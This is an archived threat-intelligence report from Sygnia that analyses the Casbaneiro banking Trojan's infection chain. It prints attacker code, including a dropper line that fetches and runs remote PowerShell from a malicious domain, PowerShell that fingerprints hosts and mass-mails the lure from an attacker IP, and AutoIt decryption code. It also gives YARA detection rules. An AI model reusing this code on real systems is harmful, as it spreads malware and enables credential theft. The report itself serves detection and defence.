{
	"id": "516bd550-a9e2-446e-915c-d700c775b545",
	"created_at": "2026-04-06T00:08:23.589486Z",
	"updated_at": "2026-04-10T03:20:25.28019Z",
	"deleted_at": null,
	"sha1_hash": "4a0987254e47430711cf583ecfc826c17549d218",
	"title": "Breaking Down the Casbaneiro Infection Chain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1066248,
	"plain_text": "Breaking Down the Casbaneiro Infection Chain\r\nBy Sygnia\r\nPublished: 2022-04-07 · Archived: 2026-04-02 12:44:17 UTC\r\nBackground\r\nIn 2018, the Casbaneiro banking Trojan (also referred to as Metamorfo) surfaced in mass MalSpam campaigns targeting\r\nLatin America. The primary objective, based on built-in functions, was to record keystrokes and harvest user credentials for\r\nfinancial websites.\r\nTo this day, the campaign is still very active with the target objective of financial gain. The threat actors behind the\r\ncampaign utilize a variety of techniques to avoid detection and execute malicious code on compromised assets. A high-level\r\nvisual representation of the multi-stage infection chain, depicted in Figure 1, has been derived from incidents investigated\r\nand mitigated by Sygnia’s Incident Response Team.\r\nFigure 1: Casbaneiro Trojan infection chain\r\nInitial access \u0026 propagation\r\nThe infection begins with a malicious email written in Spanish emphasizing the urgent need for reviewing a PDF attachment\r\n(“Comprobante_Fiscal_Digital.pdf”). 
These attachments typically contain an invoice with a web link to a URL which claims\r\nto contain further details.\r\nFigure 2: Snippet of “Comprobante_Fiscal_Digital.pdf”\r\nOnce a user has accessed the website, they are prompted to download a zip archive containing a malicious “.cmd” script.\r\nClicking the script initiates a series of commands hidden from view, and will trigger the download of additional scripts and\r\nbinaries from one of many selected malicious domains.\r\nset LBXU=in 1 –\r\nset FPBB=GUV398481\r\nset NN=http://a93ks.hopto[.]org/300122/YXP=FSVPJJBEKT295058/YXP=FSVPJJBEKT295058\r\necho ieX(“IeX(New-oBJeCt Net.WebClIeNt).DOwnlOadStRING(‘%NN%’)”); |\r\n%QAOW%%FWI%%MSBJK%%JJIJ%%QRNT%%YFF%%BPQBDM%%IJPB%%HDFSKP%%SZN%%QACX%%ICYJRO%%UBSD%%HE\r\nDEL “%~f0″ \r\nFigure 3: Partial code-snippet of the dropper “.cmd” script\r\nhttps://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/\r\nPage 1 of 10\n\nAs with many similar incidents, the adversary utilizes a “living-off-the-land” approach, using common binaries and scripts,\r\nmost notably PowerShell, in order to carry out a variety of tasks. The threat actors use variables that include non-standard\r\ncharacters, strings encoded in Base64 UTF-16LE (Unicode), and which operate in memory during execution, all in an\r\nattempt to avoid detection and hamper reverse-engineering.\r\nFigure 4: Snippet of obfuscated PowerShell code as seen in PowerShell/Operational Windows Event Logs\r\nA series of system discovery commands leveraging PowerShell and Windows Management Instrumentation (WMI) are\r\ncarried out on the victim host, in order to fingerprint the system. 
This includes the collection of basic information such as the\r\nlanguage, AntiVirus software, operating system version, CPU architecture and hostname:\r\n$lang = Get-Culture\r\n$AntivirusProduct = Get-WmiObject -Namespace “root\\SecurityCenter2” -Query\r\n“SELECT * FROM AntiVirusProduct” @psboundparameters\r\n$winds = (Get-WmiObject -class Win32_OperatingSystem).Caption\r\n$env:PROCESSOR_ARCHITECTURE\r\n$env:computername\r\nAs with most MalSpam campaigns, we would expect to see an increased number of malicious emails received from external\r\ndomains. However, of particular interest in our analysis, we have observed the threat actors installing the Outlook Messaging\r\nApplication Programming Interface (MAPI) via PowerShell to harvest email addresses/contacts, which are then exfiltrated via\r\nHTTP POST requests to a command and control (C2) server. One function is dedicated to checking that the data received into a\r\nvariable follows the expected email address format, using the regular expression:\r\n^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$\r\nThe objective at the end of the process is to leverage the compromised host to send thousands of MalSpam emails\r\ninternally to unsuspecting employees of the organization. This adds credibility to the emails sent, as there are no obvious\r\nanomalies in the email headers (such as suspicious external domains), which would typically trigger email security solutions to act\r\nand mitigate. 
The emails include the same PDF attachment used to compromise the previous victim hosts, and so the chain\r\nis executed once more.\r\nfuncE\r\nemail sending section\r\n$path = “C:\\Users\\Public\\010222”\r\n$path2 = “C:\\Users\\Pubic\\010222\\Combrobante_Fiscal_Digital.pdf”\r\n{var22} = “http://192.53.120.76/tst.factura,odf”\r\nif (($path | Test-Path)) { Remove-Item $path -Recurse }\r\nNew-Item -ItemType directory -Path $path\r\n{var23} = new-object System.Net.WebClient\r\n{var23}.DownloadFile”(var22)”,”$path2″\r\n$OL = {var2}\r\n$result = {var4}\r\nforeach ($line in $result.Split(“‘n”)) {\r\n$hora = Get-Date -Format G;\r\nforeach ($file in (Get-ChildItem -Path $path -File)) {\r\n$mItem = $OL.CreateItem(“olMailItem”)\r\n$mItem.To = “$line”\r\n$mItem.Subject = “Te ha enviado un Comprobante Fiscal Digital :ATT $hora”\r\n$mItem.Body = “Consulte los datos adjuntos, por favor. $hora “\r\n$mItem.Attachments.Add($file.FullName)\r\n$mItem.Send()\r\n}\r\nstart-sleep \r\nFigure 5: De-obfuscated PowerShell function for distributing emails\r\nStaging bundled malware, persistence \u0026 execution\r\nThe setup of the malware involves multiple scripts and legitimate binaries that are downloaded as part of the previous\r\nstages. During one of the infection stages, a zip file is dropped into the directory “\\Users\\Public\\”, in order to stage one of\r\ntwo bundles.\r\nFigure 6: “m.zip”, two separate bundles\r\nA “.cmd” script with a filename matching the victim hostname is used to randomly generate a directory on the root of\r\nvolume “C:\\” following the naming format of the folder as “_\u003c6 letters + 1 number\u003e_\u003ccapital letter\u003e”. 
This can be\r\ntranslated into a regular expression for the purposes of identification:\r\n_{1}[A-Za-z]{6}[0-9]_[A-Z]{1}\r\n@Echo off\r\nSetlocal EnableExtensions\r\nSetlocal EnableDelayedExpansion\r\ncd %SystemRoot%\\System32\r\nSet /P _yuzhtp2_V=\u003c“C:_yuzhtp2_V\\”\r\nset chars=0123456789abcdefghijklmnopqrstuvwxyz\r\nfor /L %%N in (10 1 36) do (\r\nfor /F %%C in (“!chars:~%%N,1!”) do (\r\nset “_yuzhtp2_V=!_yuzhtp2_V:%%N=%%C!”\r\n)\r\n)\r\n)\r\nfor /F %%F in (“!_yuzhtp2_V!”) do (\r\nset “_yuzhtp2_V=!_yuzhtp2_V:@=!”\r\n)\r\nfor /F %%F in (“!_yuzhtp2_V!”) do (\r\nset “_yuzhtp2_V=!_yuzhtp2_V:”=!”\r\n)\r\n%_yuzhtp2_V%\r\nFigure 7: Code-snippet of the “.cmd” script used for folder directory setup\r\nThe next phase in the infection chain is the execution of the banking Trojan malware on the victim host. This is achieved by\r\none of two methods, whilst evading detection. The aforementioned naming convention is used with Execution Method 1 to\r\nrename the bundled encrypted binaries. The only exception to this is Execution Method 2, where only the folder directory\r\nand non-DLL recognized binaries are renamed due to the technique leveraged during execution, which we will explore\r\nfurther shortly.\r\nIn order to execute the binaries and scripts, shortcut “.lnk” files are created, and masquerade as symbolic links to Internet\r\nExplorer, when in fact they point towards the malicious files. The shortcuts are first used to execute the “.cmd” scripts used\r\nfor renaming the folder and next for executing AutoIt to trigger the start of the execution chain.\r\nWhenever the Windows operating system starts, the legitimate application is launched, thus providing a persistence\r\nmechanism. It should be noted that Sygnia did observe deletion of the “.lnk” files on some occasions, post-execution. 
This is\r\nlikely because every time the scripts are run, a new randomly named folder directory is generated, and a significant number\r\nof abnormal folder names would be visible and may raise concern amongst users if spotted.\r\nFigure 8: Obfuscated script creating “.lnk” shortcuts, renaming binaries \u0026 deleting “.zip” files\r\nFigure 9: Shortcut executing the AutoIt binary with the AutoIt script argument\r\nExecution Method 1\r\nThe first method of execution involves utilizing a legitimate signed AutoIt PE binary, in order to execute an encrypted\r\nAutoIt script. The encrypted AutoIt script is used to export a malicious function from the third bundled binary, which is the\r\nencrypted Trojan. As the process is invoked under a trusted application, the actions subsequently taken may seem legitimate.\r\nAs depicted in Figure 6, three binaries are present in the first bundle: AutoIt (“exe.png”), an encrypted AutoIt script (“1”)\r\nand the encrypted Trojan (“m”). As previously mentioned, these binaries are renamed post-creation by the “.cmd” script\r\nfollowing the naming convention. By reviewing the script binary in a hex editor, it’s possible to obtain metadata such as\r\nthe versioning, creation time, and the MD5 hash value of the password used to encrypt the script via the Jos van der Zande\r\nAutoIt3 Obfuscator.\r\nOnce decrypted and decompiled, the script contains multiple functions which focus on cryptography, primarily for the\r\nobjective of decrypting the Trojan. During the decryption process, a new decrypted binary with a specific file extension is\r\ncreated in the current working directory and then a DllCall is made to invoke the function\r\n“F0x000102030405060708090A0B0C0D0E0F” that is exported from the malicious decrypted dynamic link library (DLL)\r\nbinary, resulting in execution. 
\r\nGLOBAL $OLA=@WORKINGDIR\r\nGLOBAL $OLA1=STRINGMID($OLA,4,16)\r\n$OLA1=$OLA1\u0026”.ia”\r\nLOCAL $OLA2=$OLA1\u0026”a.db”\r\nLOCAL $OLA3=$CALG_AES_256\r\nLOCAL $OLA4=”60801029″\r\nIF _CRYPT_DECRYPTFILE($OLA1,$OLA2,$OLA4,$OLA3)THEN\r\nENDIF\r\nGLOBAL $OLA5=DLLOPEN($OLA2)\r\nDLLCALL($OLA5,”STRUCT”,”F0x000102030405060708090A0B0C0D0E0F”)\r\nFigure 10: Code snippet of the decompiled AutoIt script: decrypt, generate \u0026 initiate DllCall\r\nFigure 11: Decrypted Trojan (.iaa.db) with notable export function\r\nThe file extensions of the decrypted payload were hardcoded and could be any of the following: .ai, .ia, .db, .a1, .bc or .iaa.\r\nThese were typically chosen to masquerade the decrypted payload as a benign file type (e.g. .db, an SQLite database extension).\r\nExecution Method 2\r\nThe second method of execution uses a different version of the archive “m.zip” bundle. As depicted in Figure 6, three\r\nbinaries are present in the bundle: a legitimate Oracle Java Platform SE 8 PE (“exe.png”), a legitimate Microsoft Visual\r\nStudio 2010 runtime library (“MSVCR100.dll”) and a malicious dynamic link library (DLL) masquerading as a legitimate file (“jli.dll”)\r\ncommonly used in conjunction with the Oracle Java (“kinit.exe”) file.\r\nA review of the import functions required by the Oracle Java application, as depicted in Figure 12, confirms the requirement\r\nfor a (“jli.dll”) binary, supposedly developed by Oracle, to be present.\r\nFigure 12: Legitimate Oracle Java (kinit.exe) imported functions from jli.dll\r\nOn closer inspection of the (“jli.dll”) binary, it does not appear to have been developed by Oracle, based on a review of\r\nstatic properties, as depicted in Figure 13. 
However, the binary does have export function names which are expected and\r\nrequired by the Java application.\r\nFigure 13: Malicious “jli.dll” file properties\r\nFigure 14: Malicious “jli.dll” file notable export functions\r\nThis is significant, as the adversary intends to facilitate DLL search order hijacking by placing the malicious DLL file in the\r\nsame directory as the legitimate Oracle Java application. This will then be used for DLL side-loading the malicious payload,\r\nresulting in execution.\r\nSygnia was able to identify numerous different payloads, compiled and deployed by the adversary from December 2021\r\nthrough February 2022. Some were packed via “VMProtect” and unpacked into memory upon execution, whilst others were\r\nencrypted and only decrypted upon execution. All of the DLL files were written in Pascal, compiled by “borlanddelphi”, and\r\nwere found to contain Portuguese language strings throughout. Additional embedded functions were found to be obfuscated\r\nto hamper reverse-engineering. What was consistent was the use of the magic string “Staticdata” as the software product\r\nreference in the file properties. This could be utilized to identify any decrypted payloads on hosts, which may not be known\r\nto AntiVirus signature databases.\r\nFurther analysis of multiple malware binaries showed that, once initially executed, the malware harvests information including\r\nthe hostname, operating system version and AntiVirus software installed. This data is then exfiltrated to a hardcoded\r\ncommand and control (C2) server via port 80 (HTTP), and the malware awaits further commands.\r\nFigure 15: Initial fingerprinting of victim host \u0026 exfiltration\r\nFull reverse-engineering details are beyond the scope of this report. Functions were observed to facilitate\r\nrecording keystrokes from the compromised host. 
Whilst the malware currently has no known links to facilitate access for\r\nother threat actors, operating under a strict regime, this could lead to more nefarious activities, and therefore effective\r\nmitigation should be deployed at the earliest opportunity.\r\nIf you are currently impacted by a cyber incident, or are seeking guidance, please contact us or call our 24/7 hotline +1-877-686-86\r\nAppendices\r\nYARA Rules\r\nrule Casbanerio_Dropper_Script\r\n{\r\n    meta:\r\n        author = \"Dan Saunders\"\r\n        copyright = \"Sygnia\"\r\n        date = \"22/02/2022\"\r\n        version = \"1.0\"\r\n        description = \"Detects Casbanerio Dropper Script.\"\r\n        tlp = \"WHITE\"\r\n    strings:\r\n        $s1 = \"%SystemRoot%\" wide ascii\r\n        $d1 = \"http://a93ks.hopto.org\" wide ascii\r\n        $d2 = \"http://dz.myddns.me\" wide ascii\r\n        $d3 = \"http://newyear1.gotdns.ch\" wide ascii\r\n        $d4 = \"http://m9b4s2.site\" wide ascii\r\n        $p1 = \"IeX(New-oBJeCt Net.WebClIeNt).DOwnlOadStRING('%NN%')\" wide ascii\r\n        $p2 = \"Ie X (N ew-oBJ e Ct N et. Web ClIeNt ).DOwnlOa d StRIN G('%NN%')\" wide ascii\r\n        $r1 = \"%~f0\" wide ascii\r\n    condition:\r\n        $s1 and (1 of ($d*) and (1 of ($p*) and $r1 and filesize \u003c 1KB))\r\n}\r\nrule Casbanerio_Directory_Script\r\n{\r\n    meta:\r\n        author = \"Dan Saunders\"\r\n        copyright = \"Sygnia\"\r\n        date = \"22/02/2022\"\r\n        version = \"1.0\"\r\n        description = \"Detects Casbanerio Directory Script.\"\r\n        tlp = \"WHITE\"\r\n    strings:\r\n        $s1 = \"%SystemRoot%\" wide ascii\r\n        $s2 = \"Setlocal EnableExtensions\" wide ascii\r\n        $s3 = \"Setlocal EnableDelayedExpansion\" wide ascii\r\n        $s4 = \"set chars=0123456789abcdefghijklmnopqrstuvwxyz\" wide ascii\r\n        $s5 = \"Set /P\" wide ascii\r\n        $s6 = \"for /L %%N\" wide ascii\r\n        $s7 = \"for /F %%C\" wide ascii\r\n        $s8 = \"for /F %%F\" wide ascii\r\n    condition:\r\n        all of ($s*) and filesize \u003c 500\r\n}\r\nrule Casbanerio_Trojan_DLL\r\n{\r\n    meta:\r\n        author = \"Dan Saunders\"\r\n        copyright = \"Sygnia\"\r\n        date = \"22/02/2022\"\r\n        version = \"1.0\"\r\n        description = \"Detects Decrypted Casbanerio Trojan DLL.\"\r\n        tlp = \"WHITE\"\r\n    strings:\r\n        $fh = { 4D 5A 50 }\r\n        $s1 = \"Staticdata\" fullword wide ascii\r\n        $s2 = \"com.embarcadero.Staticdata\" fullword wide ascii\r\n    condition:\r\n        $fh at 0 and (all of ($s*) and filesize \u003e 10KB and filesize \u003c 20KB)\r\n}\r\nIndicators of Compromise\r\nDomains \u0026 IPs\r\nFile Hashes\r\nMITRE ATT\u0026CK® TTPs\r\nInitial Access:\r\n1. T1566 – Phishing\r\n    1. T1566.001 – Phishing: Spearphishing Attachment\r\n    2. T1566.002 – Phishing: Spearphishing Link\r\nExecution:\r\n2. T1204 – User Execution\r\n    1. T1204.002 – Malicious File\r\n3. T1059 – Command and Scripting Interpreter\r\n    1. T1059.001 – PowerShell\r\n    2. T1059.003 – Windows Command Shell\r\n4. T1574 – Hijack Execution Flow\r\n    1. T1574.001 – DLL Search Order Hijacking\r\n    2. T1574.002 – DLL Side-Loading\r\n5. T1129 – Shared Modules\r\n6. T1047 – Windows Management Instrumentation\r\nPersistence:\r\n7. T1547 – Boot or Logon Autostart Execution\r\n    1. T1547.009 – Shortcut Modification\r\nDefense Evasion:\r\n8. T1140 – Deobfuscate/Decode Files or Information\r\n9. T1036 – Masquerading\r\n    1. T1036.005 – Match Legitimate Name or Location\r\n    2. T1036.007 – Double File Extension\r\n10. T1027 – Obfuscated Files or Information\r\n    1. T1027.002 – Software Packing\r\nCredential Access:\r\n11. T1056 – Input Capture\r\n    1. T1056.001 – Keylogging\r\n    2. T1056.002 – GUI Input Capture\r\nDiscovery:\r\n12. T1518 – Software Discovery\r\n    1. T1518.001 – Security Software Discovery\r\n13. T1033 – System Owner/User Discovery\r\n14. T1082 – System Information Discovery\r\nCollection:\r\n15. T1115 – Clipboard Data\r\n16. T1119 – Automated Collection\r\nCommand \u0026 Control:\r\n17. T1102 – Web Service\r\n    1. T1102.003 – One-Way Communication\r\nExfiltration:\r\n18. T1041 – Exfiltration Over C2 Channel\r\n19. T1071 – Application Layer Protocol\r\n    1. T1071.001 – Web Protocols\r\nThis blog post and any information or recommendation contained herein has been prepared for general informational\r\npurposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to\r\nany entity. While we have made attempts to ensure the information contained herein has been obtained from reliable sources\r\nand to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is\r\nnot responsible for any errors or omissions, or for the results obtained from the use of this blog post. This blog post is\r\nprovided on an as-is basis, and without warranties of any kind.\r\nSource: https://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain/"
	],
	"report_names": [
		"breaking-down-casbaneiro-infection-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434103,
	"ts_updated_at": 1775791225,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a0987254e47430711cf583ecfc826c17549d218.pdf",
		"text": "https://archive.orkl.eu/4a0987254e47430711cf583ecfc826c17549d218.txt",
		"img": "https://archive.orkl.eu/4a0987254e47430711cf583ecfc826c17549d218.jpg"
	}
}